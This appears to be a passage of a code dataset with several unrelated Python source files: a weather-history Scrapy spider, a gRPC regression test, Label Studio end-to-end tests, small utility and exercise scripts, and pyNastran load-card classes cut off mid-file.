You may use Markdown here.')),\n            ],\n        ),\n    ]\n","sub_path":"projects/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"260084532","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\nC2017-39\r\n\r\n\r\n\"\"\"\r\nimport scrapy\r\nfrom carbuisness.items import w58officeitem\r\nimport time\r\nfrom scrapy.conf import settings\r\nfrom scrapy.mail import MailSender\r\nimport logging\r\nimport json\r\nimport re\r\nimport random\r\nimport hashlib\r\nfrom hashlib import md5\r\nfrom carbuisness.getip import getProxy\r\nfrom selenium import webdriver\r\nfrom scrapy.xlib.pydispatch import dispatcher\r\nfrom scrapy import signals\r\nfrom scrapy.conf import settings\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nfrom carbuisness.items import WeatherItem\r\n\r\nwebsite='weather_tianqihoubao'\r\n\r\nclass CarSpider(scrapy.Spider):\r\n\r\n    name=website\r\n    start_urls = [\r\n        \"http://www.tianqihoubao.com/lishi/\"\r\n    ]\r\n\r\n    def __init__(self,**kwargs):\r\n        super(CarSpider,self).__init__(**kwargs)\r\n        self.mailer=MailSender.from_settings(settings)\r\n        self.counts=0\r\n        self.carnum=800000\r\n\r\n        settings.set('CrawlCar_Num',self.carnum,priority='cmdline')\r\n        settings.set('MONGODB_DB','carbusiness',priority='cmdline')\r\n        settings.set('MONGODB_COLLECTION',website,priority='cmdline')\r\n\r\n\r\n    def parse(self, response):\r\n        dls = response.xpath(\"//*[@id='content']/div[3]/dl\")\r\n        for dl in dls:\r\n            print(dl.xpath(\"./dd/a/text()\").extract_first())\r\n            if dl.xpath(\"./dd/a/text()\").extract_first() in ['上海','咸阳']:\r\n                city_url = response.urljoin(dl.xpath(\"./dd/a/@href\").extract_first())\r\n                # print(city_url)\r\n                yield scrapy.Request(url=city_url, callback=self.parse_url)\r\n        # yield scrapy.Request(url=\"http://www.tianqihoubao.com/lishi/shanghai.html\", callback=self.parse_url)\r\n        # yield scrapy.Request(url=\"http://www.tianqihoubao.com/lishi/xiaogan.html\", callback=self.parse_url)\r\n\r\n\r\n    def parse_url(self, response):\r\n        uls = response.xpath(\"//*[@id='content']/div[@class='box pcity']/ul\")\r\n        for ul in uls:\r\n            details_urls = ul.xpath(\".//a\")\r\n            # print(details_urls)\r\n            for details_url in details_urls:\r\n                # print(response.urljoin(details_url.xpath(\"@href\").extract_first()))\r\n                yield scrapy.Request(url=response.urljoin(details_url.xpath(\"@href\").extract_first()), callback=self.parse_details)\r\n\r\n    def parse_details(self,response):\r\n\r\n        trs = response.xpath(\"//*[@id='content']/table/tr\")\r\n        print(trs)\r\n        for tr in trs:\r\n            print(tr)\r\n            if trs.index(tr) != 0:\r\n                print(\"yes\")\r\n                item = WeatherItem()\r\n                item['grabtime'] = time.strftime('%Y-%m-%d %X', time.localtime())\r\n                item['url'] = response.url\r\n                item['data'] = tr.xpath(\"./td[1]/a/text()\").extract_first().strip()\r\n                item['status'] = tr.xpath(\"./td[1]/a/@href\").extract_first()\r\n                item['weather'] = tr.xpath(\"./td[2]/text()\").extract_first().strip()\r\n                item['temp'] = tr.xpath(\"./td[3]/text()\").extract_first().strip()\r\n                item['wind'] = tr.xpath(\"./td[4]/text()\").extract_first().strip()\r\n                item['data_url'] = tr.xpath(\"./td[1]/a/@href\").extract_first()\r\n                item['title'] = response.xpath(\"//*[@id='content']/h1/text()\").extract_first()\r\n                yield 
item\r\n","sub_path":"cagey/carbuisness/carbuisness/spiders/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"81496095","text":"# Copyright 2018 gRPC authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests servicers sending OK status without having read all requests.\n\nThis is a regression test of https://github.com/grpc/grpc/issues/6891.\n\"\"\"\n\nimport enum\nimport unittest\n\nimport six\n\nimport grpc\n\nfrom tests.unit import test_common\nfrom tests.unit.framework.common import test_constants\n\n_RPC_METHOD = '/serffice/Meffod'\n\n\n@enum.unique\nclass _MessageCount(enum.Enum):\n\n ZERO = (\n 0,\n 'Zero',\n )\n TWO = (\n 1,\n 'Two',\n )\n MANY = (\n test_constants.STREAM_LENGTH,\n 'Many',\n )\n\n\n@enum.unique\nclass _MessageSize(enum.Enum):\n EMPTY = (\n 0,\n 'Empty',\n )\n SMALL = (\n 32,\n 'Small',\n ) # Smaller than any flow control window.\n LARGE = (\n 3 * 1024 * 1024,\n 'Large',\n ) # Larger than any flow control window.\n\n\n_ZERO_MESSAGE = b''\n_SMALL_MESSAGE = b'\\x07' * _MessageSize.SMALL.value[0]\n_LARGE_MESSAGE = b'abc' * (_MessageSize.LARGE.value[0] // 3)\n\n\n@enum.unique\nclass _ReadRequests(enum.Enum):\n\n ZERO = (\n 0,\n 'Zero',\n )\n TWO = (\n 2,\n 'Two',\n )\n\n\nclass _Case(object):\n\n def __init__(self, request_count, request_size, request_reading,\n response_count, response_size):\n self.request_count = request_count\n self.request_size = request_size\n self.request_reading = request_reading\n self.response_count = response_count\n self.response_size = response_size\n\n def create_test_case_name(self):\n return '{}{}Requests{}Read{}{}ResponsesEarlyOKTest'.format(\n self.request_count.value[1], self.request_size.value[1],\n self.request_reading.value[1], self.response_count.value[1],\n self.response_size.value[1])\n\n\ndef _message(message_size):\n if message_size is _MessageSize.EMPTY:\n return _ZERO_MESSAGE\n elif message_size is _MessageSize.SMALL:\n return _SMALL_MESSAGE\n elif message_size is _MessageSize.LARGE:\n return _LARGE_MESSAGE\n\n\ndef _messages_to_send(count, size):\n for _ in range(count.value[0]):\n yield _message(size)\n\n\ndef _draw_requests(case, request_iterator):\n for _ in range(\n min(case.request_count.value[0], case.request_reading.value[0])):\n next(request_iterator)\n\n\ndef _draw_responses(case, response_iterator):\n for _ in range(case.response_count.value[0]):\n next(response_iterator)\n\n\nclass _MethodHandler(grpc.RpcMethodHandler):\n\n def __init__(self, case):\n self.request_streaming = True\n self.response_streaming = True\n self.request_deserializer = None\n self.response_serializer = None\n self.unary_unary = None\n self.unary_stream = None\n self.stream_unary = None\n self._case = case\n\n def stream_stream(self, request_iterator, servicer_context):\n _draw_requests(self._case, request_iterator)\n\n for response in _messages_to_send(self._case.response_count,\n 
self._case.response_size):\n yield response\n\n\nclass _GenericHandler(grpc.GenericRpcHandler):\n\n def __init__(self, case):\n self._case = case\n\n def service(self, handler_call_details):\n return _MethodHandler(self._case)\n\n\nclass _EarlyOkTest(unittest.TestCase):\n\n def setUp(self):\n self._server = test_common.test_server()\n port = self._server.add_insecure_port('[::]:0')\n self._server.add_generic_rpc_handlers((_GenericHandler(self.case),))\n self._server.start()\n\n self._channel = grpc.insecure_channel('localhost:%d' % port)\n self._multi_callable = self._channel.stream_stream(_RPC_METHOD)\n\n def tearDown(self):\n self._server.stop(None)\n\n def test_early_ok(self):\n requests = _messages_to_send(self.case.request_count,\n self.case.request_size)\n\n response_iterator_call = self._multi_callable(requests)\n\n _draw_responses(self.case, response_iterator_call)\n\n self.assertIs(grpc.StatusCode.OK, response_iterator_call.code())\n\n\ndef _cases():\n for request_count in _MessageCount:\n for request_size in _MessageSize:\n for request_reading in _ReadRequests:\n for response_count in _MessageCount:\n for response_size in _MessageSize:\n yield _Case(request_count, request_size,\n request_reading, response_count,\n response_size)\n\n\ndef _test_case_classes():\n for case in _cases():\n yield type(case.create_test_case_name(), (_EarlyOkTest,), {\n 'case': case,\n '__module__': _EarlyOkTest.__module__,\n })\n\n\ndef load_tests(loader, tests, pattern):\n return unittest.TestSuite(\n tests=tuple(\n loader.loadTestsFromTestCase(test_case_class)\n for test_case_class in _test_case_classes()))\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"src/python/grpcio_tests/tests/unit/_early_ok_test.py","file_name":"_early_ok_test.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"557728752","text":"# Array-2\n\n## Problem1 (https://leetcode.com/problems/find-all-numbers-disappeared-in-an-array/)\n\n\n#Time Complexity : O(n)\n# Space Complexity : O(n) \n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n\n\nclass Solution:\n def findDisappearedNumbers(self, nums: List[int]) -> List[int]:\n result=[0]*(len(nums)+1)\n for i in nums:\n result[i]+=1\n temp=[]\n for index,val in enumerate(result):\n if index!=0 and val==0:\n temp.append(index)\n return temp","sub_path":"Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"495505184","text":"# python\nimport os\n\n# 3rd party\nimport pytest\nimport unittest\n\n# label_studio\nfrom label_studio import server\nfrom label_studio.tests.base import (\n test_client, captured_templates, goc_project,\n)\nfrom label_studio.tests.e2e_actions import (\n prepare,\n action_config, action_config_test,\n action_import, action_import_test,\n action_get_all_tasks,\n action_get_task,\n action_next_task,\n action_delete_task, action_delete_all_tasks,\n action_cancel_task,\n action_label, action_label_test,\n action_get_all_completions,\n action_get_change_completion,\n action_export, action_export_test,\n)\nfrom label_studio.tests.scenarios import scenarios\n\n\nACTIONS = {\n 'prepare': prepare,\n 'config': action_config,\n 'import': action_import,\n 'get_task': action_get_task,\n 'get_all_tasks': action_get_all_tasks,\n 'next_task': action_next_task,\n 'delete_task': 
action_delete_task,\n 'delete_all_tasks': action_delete_all_tasks,\n 'cancel_task': action_cancel_task,\n 'label': action_label,\n 'get_all_completions': action_get_all_completions,\n 'change_completion': action_get_change_completion,\n 'export': action_export\n}\n\n\n@pytest.fixture(autouse=True)\ndef default_project(monkeypatch):\n \"\"\"\n apply patch for\n label_studio.server.project_get_or_create()\n for all tests.\n \"\"\"\n monkeypatch.setattr(server, 'project_get_or_create', goc_project)\n\n\ndef idfn(test_val):\n return list(test_val.keys())[0]\n\n\nclass TestCase:\n \"\"\"\n Test case parametrised factory\n to run different scenarios\n from scenarios\n \"\"\"\n\n test_case_config = scenarios\n\n @pytest.mark.parametrize('test_case_config', test_case_config, ids=idfn)\n def test_start(self, test_client, test_case_config):\n case = list(test_case_config.values())[0]\n for a, data in case:\n ACTIONS[a](test_client, data)\n","sub_path":"label_studio/tests/e2e_test.py","file_name":"e2e_test.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"540737672","text":"import sys\nfrom PyQt5.QtWidgets import *\n\nclass DropWidget(QWidget):\n def __init__(self, parent=None):\n super(DropWidget, self).__init__(parent)\n self.setAcceptDrops(True)\n\n def dragEnterEvent(self, event):\n event.accept()\n mimeData = event.mimeData()\n print('dragEnterEvent')\n\n\n def dropEvent(self, event):\n event.accept()\n mimeData = event.mimeData()\n print('dropEvent')\n for mimetype in mimeData.formats():\n print('MIMEType:', mimetype)\n print('Data:', mimeData.data(mimetype))\n print()\n print()\n\ndef main():\n app = QApplication(sys.argv)\n w = DropWidget()\n w.resize(800, 600)\n w.show()\n w.raise_()\n app.exec_()\n\nif __name__ == '__main__':\n main()","sub_path":"stimulation/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"119839949","text":"from pygeocoder import Geocoder\n\nimport numpy as np\nimport time\n\ndef get_coordinates(location, timeout = 25):\n counter = 0\n result = (np.nan,np.nan)\n while True:\n try:\n result = Geocoder.geocode(location)\n return result.coordinates\n except Exception as e:\n counter = counter + 1\n if counter >= timeout:\n result = (np.nan,np.nan)\n print(e)\n return result\n time.sleep(2)\n \n \n#print(get_coordinates('Aachen',timeout=3))","sub_path":"GeoCodingTool.py","file_name":"GeoCodingTool.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"342819065","text":"from sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata=pd.read_csv(\"ex3.txt\",delimiter=\",\")\n#data=data.as_matrix()\n\nX1=data.iloc[:,[0]].values\nX2=data.iloc[:,[1]].values\nad=data.iloc[:,[2]].values\n\nprint(ad)\n\n#Plot and show\n\nplt.scatter(X1, X2, c=ad)\nplt.show()\n\nX=data.iloc[:,:-1].values\ny=data.iloc[:, -1].values\nprint(X)\nprint(y)\n\n#Splitting the data\n\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.40)\n\n#Using KNN\n\nknn=KNeighborsClassifier(n_neighbors=4)\nknn.fit(X_train,y_train)\ny_pred=knn.predict(X_test)\n\nprint(y_pred)\n\n#Plot and 
show\n\nplt.scatter(y_test,y_pred)\nplt.show()\n","sub_path":"DAY5/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"639686873","text":"# pylint: disable=C0103,R0902,R0904,R0914,W0231,R0201\r\n\"\"\"\r\nAll static loads are defined in this file. This includes:\r\n\r\n * LSEQ\r\n * DLOAD\r\n * DAREA\r\n * SLOAD\r\n * TLOAD1\r\n * TLOAD2\r\n * RFORCE\r\n * RLOAD1\r\n * RLOAD2\r\n * RANDPS\r\n\"\"\"\r\nfrom __future__ import (nested_scopes, generators, division, absolute_import,\r\n print_function, unicode_literals)\r\n#import sys\r\nfrom itertools import izip\r\n\r\nfrom pyNastran.bdf.fieldWriter import set_blank_if_default\r\nfrom pyNastran.bdf.cards.baseCard import BaseCard\r\nfrom pyNastran.bdf.bdfInterface.assign_type import (integer, integer_or_blank,\r\n double, double_or_blank,\r\n integer_string_or_blank,\r\n string_or_blank, integer_double_or_blank,\r\n components_or_blank)\r\nfrom pyNastran.bdf.fieldWriter import print_card_8\r\nfrom pyNastran.bdf.fieldWriter16 import print_card_16\r\n\r\n\r\nclass Load(BaseCard):\r\n \"\"\"defines the DefaultLoad class\"\"\"\r\n type = 'DefLoad'\r\n\r\n def __init__(self, card, data):\r\n self.cid = None\r\n self.nodes = None\r\n\r\n def Cid(self):\r\n if isinstance(self.cid, int):\r\n return self.cid\r\n else:\r\n return self.cid.cid\r\n\r\n def nodeIDs(self, nodes=None):\r\n \"\"\"returns nodeIDs for repr functions\"\"\"\r\n if not nodes:\r\n nodes = self.nodes\r\n if isinstance(nodes[0], int):\r\n return [node for node in nodes]\r\n else:\r\n return [node.nid for node in nodes]\r\n\r\n\r\nclass LoadCombination(Load): # LOAD, DLOAD\r\n def __init__(self, card, data):\r\n Load.__init__(self, card, data)\r\n\r\n if card:\r\n #: load ID\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n #: overall scale factor\r\n self.scale = double(card, 2, 'scale')\r\n\r\n #: individual scale factors (corresponds to loadIDs)\r\n self.scaleFactors = []\r\n\r\n #: individual loadIDs (corresponds to scaleFactors)\r\n self.loadIDs = []\r\n\r\n # alternating of scale factor & load set ID\r\n nLoads = len(card) - 3\r\n assert nLoads % 2 == 0\r\n for i in xrange(nLoads // 2):\r\n n = 2 * i + 3\r\n self.scaleFactors.append(double(card, n, 'scaleFactor'))\r\n self.loadIDs.append(integer(card, n + 1, 'loadID'))\r\n else:\r\n self.sid = data[0]\r\n self.scale = data[1]\r\n self.scaleFactors = data[2]\r\n self.loadIDs = data[3]\r\n assert len(data) == 4, '%s data=%s' % (self.type, data)\r\n\r\n def cross_reference(self, model):\r\n loadIDs2 = []\r\n msg = ' which is required by %s=%s' % (self.type, self.sid)\r\n for loadID in self.loadIDs:\r\n loadID2 = model.Load(loadID, msg=msg)\r\n loadIDs2.append(loadID2)\r\n self.loadIDs = loadIDs2\r\n\r\n def LoadID(self, lid):\r\n if isinstance(lid, int):\r\n return lid\r\n elif isinstance(lid, list):\r\n return lid[0].sid\r\n else:\r\n raise NotImplementedError(lid)\r\n\r\n #def Sid(self):\r\n # try:\r\n # if isinstance(self.sid, int):\r\n # return self.sid\r\n # elif isinstance(self.sid, list):\r\n # #sys.stderr.write('type(lid[0]) = %s' %(type(self.lid[0])))\r\n # #sys.stderr.write(\"the offending load...%s\" %(self.lid[0]))\r\n # return self.sid[0].sid\r\n # #elif isinstance(self.lid,load)\r\n # else:\r\n # #sys.stderr.write(\"the offending load...%s\" %(self.lid))\r\n # return self.sid.sid\r\n # except:\r\n # msg = \"error in loads.py - self.lid=\\n %s\\n\" % (str(self.sid))\r\n # sys.stderr.write(msg)\r\n # 
raise\r\n\r\n #def LoadID(self, loadID):\r\n #print(\"load = \",loadID)\r\n #if isinstance(loadID, int):\r\n # return loadID\r\n #elif isinstance(loadID, list):\r\n # return loadID[0].LoadID()\r\n ##print(\"self.lid = \",load.lid)\r\n #asdf\r\n #return load.lid\r\n\r\n def getLoads(self):\r\n \"\"\"\r\n .. note:: requires a cross referenced load\r\n \"\"\"\r\n loads = []\r\n for allLoads in self.loadIDs:\r\n for load in allLoads:\r\n loads += load.getLoads()\r\n #loads += self.ID #: :: todo: what does this mean, was uncommented\r\n return loads\r\n\r\n\r\nclass LSEQ(BaseCard): # Requires LOADSET in case control deck\r\n \"\"\"\r\n Defines a sequence of static load sets\r\n\r\n .. todo:: how does this work...\r\n \"\"\"\r\n type = 'LSEQ'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n self.sid = integer(card, 1, 'sid')\r\n self.exciteID = integer(card, 2, 'exciteID')\r\n self.lid = integer(card, 3, 'lid')\r\n self.tid = integer_or_blank(card, 4, 'tid')\r\n assert len(card) <= 5, 'len(LSEQ card) = %i' % len(card)\r\n else:\r\n self.sid = data[0]\r\n self.exciteID = data[1]\r\n self.lid = data[2]\r\n self.tid = data[3]\r\n raise NotImplementedError()\r\n\r\n #def nodeIDs(self, nodes=None):\r\n #\"\"\"returns nodeIDs for repr functions\"\"\"\r\n #if not nodes:\r\n # nodes = self.nodes\r\n #if isinstance(nodes[0], int):\r\n # return [node for node in nodes]\r\n #else:\r\n # return [node.nid for node in nodes]\r\n\r\n def cross_reference(self, model):\r\n msg = ' which is required by %s=%s' % (self.type, self.sid)\r\n self.lid = model.Load(self.lid, msg=msg)\r\n if self.tid:\r\n self.tid = model.Table(self.tid, msg=msg)\r\n\r\n def LoadID(self, lid):\r\n if isinstance(lid, int):\r\n return lid\r\n elif isinstance(lid, list):\r\n return self.LoadID(lid[0])\r\n else:\r\n return lid.sid\r\n #raise RuntimeError(lid)\r\n\r\n def getLoads(self):\r\n return self.lid\r\n\r\n def Lid(self):\r\n if isinstance(self.lid, int):\r\n return self.lid\r\n else:\r\n return self.LoadID(self.lid)\r\n #raise NotImplementedError('LSEQ ' + str(self.lid) +\r\n # '\\n%s' % (type(self.lid)))\r\n\r\n def Tid(self):\r\n if self.tid is None:\r\n return None\r\n elif isinstance(self.tid, int):\r\n return self.tid\r\n return self.tid.tid\r\n\r\n def rawFields(self):\r\n list_fields = ['LSEQ', self.sid, self.exciteID, self.Lid(), self.Tid()]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n return self.rawFields()\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.rawFields()\r\n return self.comment() + print_card_8(card)\r\n\r\n\r\nclass DLOAD(LoadCombination):\r\n type = 'DLOAD'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n LoadCombination.__init__(self, card, data)\r\n if comment:\r\n self._comment = comment\r\n\r\n def rawFields(self):\r\n list_fields = ['DLOAD', self.sid, self.scale]\r\n for (scaleFactor, loadID) in izip(self.scaleFactors, self.loadIDs):\r\n list_fields += [scaleFactor, self.LoadID(loadID)]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n return self.rawFields()\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.rawFields()\r\n return self.comment() + print_card_8(card)\r\n\r\n\r\nclass DAREA(BaseCard):\r\n \"\"\"\r\n Defines scale (area) factors for static and dynamic loads. 
In dynamic\r\n analysis, DAREA is used in conjunction with ACSRCE, RLOADi and TLOADi\r\n entries.\r\n ::\r\n\r\n DAREA SID P1 C1 A1 P2 C2 A2\r\n DAREA 3 6 2 8.2 15 1 10.1\r\n \"\"\"\r\n type = 'DAREA'\r\n\r\n def __init__(self, card=None, nOffset=0, data=None, comment=''):\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n nOffset *= 3\r\n self.sid = integer(card, 1, 'sid')\r\n self.p = integer(card, 2 + nOffset, 'p')\r\n self.c = components_or_blank(card, 3 + nOffset, 'c', 0)\r\n self.scale = double(card, 4 + nOffset, 'scale')\r\n else:\r\n self.sid = data[0]\r\n self.p = data[1]\r\n self.c = data[2]\r\n self.scale = data[3]\r\n assert len(data) == 4, 'data = %s' % data\r\n\r\n def rawFields(self):\r\n list_fields = ['DAREA', self.sid, self.p, self.c, self.scale]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.rawFields()\r\n return self.comment() + print_card_8(card)\r\n\r\n\r\nclass TabularLoad(BaseCard):\r\n def __init__(self, card, data):\r\n pass\r\n\r\n\r\nclass SLOAD(Load):\r\n \"\"\"\r\n Static Scalar Load\r\n\r\n Defines concentrated static loads on scalar or grid points.\r\n\r\n .. note:: Can be used in statics OR dynamics.\r\n\r\n If Si refers to a grid point, the load is applied to component T1 of the\r\n displacement coordinate system (see the CD field on the GRID entry).\r\n \"\"\"\r\n type = 'SLOAD'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n if comment:\r\n self._comment = comment\r\n #: load ID\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n nfields = len(card) - 2\r\n n = nfields // 2\r\n if nfields % 2 == 1:\r\n n += 1\r\n msg = 'Missing last magnitude on SLOAD card=%s' % card.fields()\r\n raise RuntimeError(msg)\r\n\r\n self.nids = []\r\n self.mags = []\r\n for i in xrange(n):\r\n j = 2 * i + 2\r\n self.nids.append(integer(card, j, 'nid' + str(i)))\r\n self.mags.append(double(card, j + 1, 'mag' + str(i)))\r\n\r\n def cross_reference(self, model):\r\n msg = ' which is required by %s=%s' % (self.type, self.sid)\r\n for (i, nid) in enumerate(self.nids):\r\n self.nids[i] = model.Node(nid, msg=msg)\r\n\r\n def Nid(self, node):\r\n if isinstance(node, int):\r\n return node\r\n return node.nid\r\n\r\n def getLoads(self):\r\n \"\"\"\r\n .. todo:: not done\r\n \"\"\"\r\n return []\r\n\r\n def rawFields(self):\r\n list_fields = ['SLOAD', self.sid]\r\n for (nid, mag) in izip(self.nids, self.mags):\r\n list_fields += [self.Nid(nid), mag]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n return self.rawFields()\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.rawFields()\r\n return self.comment() + print_card_8(card)\r\n\r\n\r\nclass TLOAD1(TabularLoad):\r\n r\"\"\"\r\n Transient Response Dynamic Excitation, Form 1\r\n\r\n Defines a time-dependent dynamic load or enforced motion of the form:\r\n\r\n .. math::\r\n \\left\\{ P(t) \\right\\} = \\left\\{ A \\right\\} \\cdot F(t-\\tau)\r\n\r\n for use in transient response analysis.\r\n \"\"\"\r\n type = 'TLOAD1'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n TabularLoad.__init__(self, card, data)\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n #: load ID\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n #: Identification number of DAREA or SPCD entry set or a thermal load\r\n #: set (in heat transfer analysis) that defines {A}. 
(Integer > 0)\r\n self.exciteID = integer(card, 2, 'exciteID')\r\n\r\n #: If it is a non-zero integer, it represents the\r\n #: identification number of DELAY Bulk Data entry that defines .\r\n #: If it is real, then it directly defines the value of that will\r\n #: be used for all degrees-of-freedom that are excited by this\r\n #: dynamic load entry. See also Remark 9. (Integer >= 0,\r\n #: real or blank)\r\n self.delay = integer_double_or_blank(card, 3, 'delay')\r\n\r\n #: Defines the type of the dynamic excitation. (LOAD,DISP, VELO, ACCE)\r\n self.Type = integer_string_or_blank(card, 4, 'Type', 'LOAD')\r\n\r\n #: Identification number of TABLEDi entry that gives F(t). (Integer > 0)\r\n self.tid = integer(card, 5, 'tid')\r\n\r\n #: Factor for initial displacements of the enforced degrees-of-freedom.\r\n #: (Real; Default = 0.0)\r\n self.us0 = double_or_blank(card, 6, 'us0', 0.0)\r\n\r\n #: Factor for initial velocities of the enforced degrees-of-freedom.\r\n #: (Real; Default = 0.0)\r\n self.vs0 = double_or_blank(card, 7, 'vs0', 0.0)\r\n if self.Type in [0, 'L', 'LO', 'LOA', 'LOAD']:\r\n self.Type = 'LOAD'\r\n elif self.Type in [1, 'D', 'DI', 'DIS', 'DISP']:\r\n self.Type = 'DISP'\r\n elif self.Type in [2, 'V', 'VE', 'VEL', 'VELO']:\r\n self.Type = 'VELO'\r\n elif self.Type in [3, 'A', 'AC', 'ACC', 'ACCE']:\r\n self.Type = 'ACCE'\r\n else:\r\n msg = 'invalid TLOAD1 type Type=|%s|' % self.Type\r\n raise RuntimeError(msg)\r\n assert len(card) <= 8, 'len(TLOAD1 card) = %i' % len(card)\r\n else:\r\n raise NotImplementedError(data)\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def cross_reference(self, model):\r\n if self.tid:\r\n msg = ' which is required by %s=%s' % (self.type, self.sid)\r\n self.tid = model.Table(self.tid, msg=msg)\r\n\r\n def Tid(self):\r\n if self.tid == 0:\r\n return None\r\n elif isinstance(self.tid, int):\r\n return self.tid\r\n return self.tid.tid\r\n\r\n def rawFields(self):\r\n list_fields = ['TLOAD1', self.sid, self.exciteID, self.delay, self.Type,\r\n self.Tid(), self.us0, self.vs0]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n us0 = set_blank_if_default(self.us0, 0.0)\r\n vs0 = set_blank_if_default(self.vs0, 0.0)\r\n list_fields = ['TLOAD1', self.sid, self.exciteID, self.delay, self.Type,\r\n self.Tid(), us0, vs0]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n return self.comment() + card_writer(card)\r\n\r\n\r\nclass TLOAD2(TabularLoad):\r\n r\"\"\"\r\n Transient Response Dynamic Excitation, Form 1\r\n\r\n Defines a time-dependent dynamic load or enforced motion of the form:\r\n\r\n .. math::\r\n \\left\\{ P(t) \\right\\} = \\left\\{ A \\right\\} \\cdot F(t-\\tau)\r\n\r\n for use in transient response analysis.\r\n \"\"\"\r\n type = 'TLOAD2'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n TabularLoad.__init__(self, card, data)\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n #: load ID\r\n #: SID must be unique for all TLOAD1, TLOAD2, RLOAD1, RLOAD2, and ACSRCE entries.\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n self.exciteID = integer(card, 2, 'exciteID')\r\n self.delay = integer_or_blank(card, 3, 'delay', 0)\r\n\r\n #: Defines the type of the dynamic excitation. (Integer; character\r\n #: or blank; Default = 0)\r\n self.Type = integer_string_or_blank(card, 4, 'Type', 'LOAD')\r\n\r\n #: Time constant. 
(Real >= 0.0)\r\n self.T1 = double_or_blank(card, 5, 'T1', 0.0)\r\n #if self.delay == 0:\r\n #self.T1 = double_or_blank(card, 5, 'T1', 0.)\r\n #else:\r\n #self.T1 = blank(card, 5, 'T1')\r\n\r\n #: Time constant. (Real; T2 > T1)\r\n self.T2 = double_or_blank(card, 6, 'T2', self.T1)\r\n #: Frequency in cycles per unit time. (Real >= 0.0; Default = 0.0)\r\n self.frequency = double_or_blank(card, 7, 'frequency', 0.)\r\n #: Phase angle in degrees. (Real; Default = 0.0)\r\n self.phase = double_or_blank(card, 8, 'phase', 0.)\r\n #: Exponential coefficient. (Real; Default = 0.0)\r\n self.c = double_or_blank(card, 9, 'c', 0.)\r\n #: Growth coefficient. (Real; Default = 0.0)\r\n self.b = double_or_blank(card, 10, 'b', 0.)\r\n #: Factor for initial displacements of the enforced degrees-of-freedom.\r\n #: (Real; Default = 0.0)\r\n self.us0 = double_or_blank(card, 11, 'us0', 0.)\r\n #: Factor for initial velocities of the enforced degrees-of-freedom\r\n #: (Real; Default = 0.0)\r\n self.vs0 = double_or_blank(card, 12, 'vs0', 0.)\r\n\r\n if self.Type in [0, 'L', 'LO', 'LOA', 'LOAD']:\r\n self.Type = 'LOAD'\r\n elif self.Type in [1, 'D', 'DI', 'DIS', 'DISP']:\r\n self.Type = 'DISP'\r\n elif self.Type in [2, 'V', 'VE', 'VEL', 'VELO']:\r\n self.Type = 'VELO'\r\n elif self.Type in [3, 'A', 'AC', 'ACC', 'ACCE']:\r\n self.Type = 'ACCE'\r\n elif self.Type in [5, 6, 7, 12, 13]:\r\n pass\r\n else:\r\n msg = 'invalid TLOAD2 type Type=|%s|' % self.Type\r\n raise RuntimeError(msg)\r\n assert len(card) <= 13, 'len(TLOAD2 card) = %i' % len(card)\r\n else:\r\n raise NotImplementedError(data)\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def cross_reference(self, model):\r\n pass\r\n # delay\r\n # 